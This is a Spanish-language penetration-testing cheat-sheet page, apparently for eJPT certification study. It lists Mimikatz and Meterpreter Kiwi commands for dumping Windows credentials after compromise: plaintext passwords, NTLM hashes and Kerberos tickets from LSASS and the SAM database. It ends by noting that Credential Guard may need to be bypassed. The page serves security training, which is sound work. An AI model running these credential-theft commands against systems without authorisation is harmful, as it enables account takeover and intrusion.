> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-cheatsheet/windows-post-explotacion/dumpeo-de-hashes-en-windows.md).

# Dumpeo de Hashes en Windows

## 📥 Dumpeo de Hashes con Mimikatz

#### 1. **Ejecutar Mimikatz como Administrador**

Debes tener privilegios elevados. Ejecuta Mimikatz como SYSTEM o desde una shell con privilegios de administrador.

```cmd
mimikatz.exe
```

#### 2. **Habilitar los privilegios necesarios**

```mimikatz
privilege::debug
```

Este comando permite a Mimikatz acceder a procesos protegidos como `lsass.exe`.

#### 3. **Obtener hashes desde LSASS**

```mimikatz
sekurlsa::logonpasswords
```

Este comando extrae credenciales almacenadas en memoria, incluyendo:

* Usuario
* Dominio
* Contraseña en texto claro (si está disponible)
* Hashes NTLM

#### 4. **Dumpear hashes del SAM**

```mimikatz
lsadump::sam
```

Este comando extrae los hashes de las cuentas locales directamente desde el SAM.

***

## 🧪 Dumpeo de Hashes con Kiwi (Meterpreter)

Kiwi es un módulo de Metasploit que incorpora funcionalidades de Mimikatz, permitiendo extraer credenciales directamente desde una sesión de Meterpreter.

#### 1. **Cargar el módulo Kiwi**

Desde una sesión Meterpreter con privilegios elevados:

```meterpreter
load kiwi
```

#### 2. **Listar credenciales en memoria**

```meterpreter
creds_all
```

Muestra credenciales almacenadas, incluyendo contraseñas en texto claro, hashes NTLM y tickets Kerberos.

#### 3. **Extraer hashes del SAM**

```meterpreter
hashdump
```

Este comando extrae los hashes de las cuentas locales del sistema.

> 💡 *Nota:* En sistemas modernos con protección de credenciales (como Credential Guard), puede que necesites bypasses adicionales para acceder a `lsass.exe`.
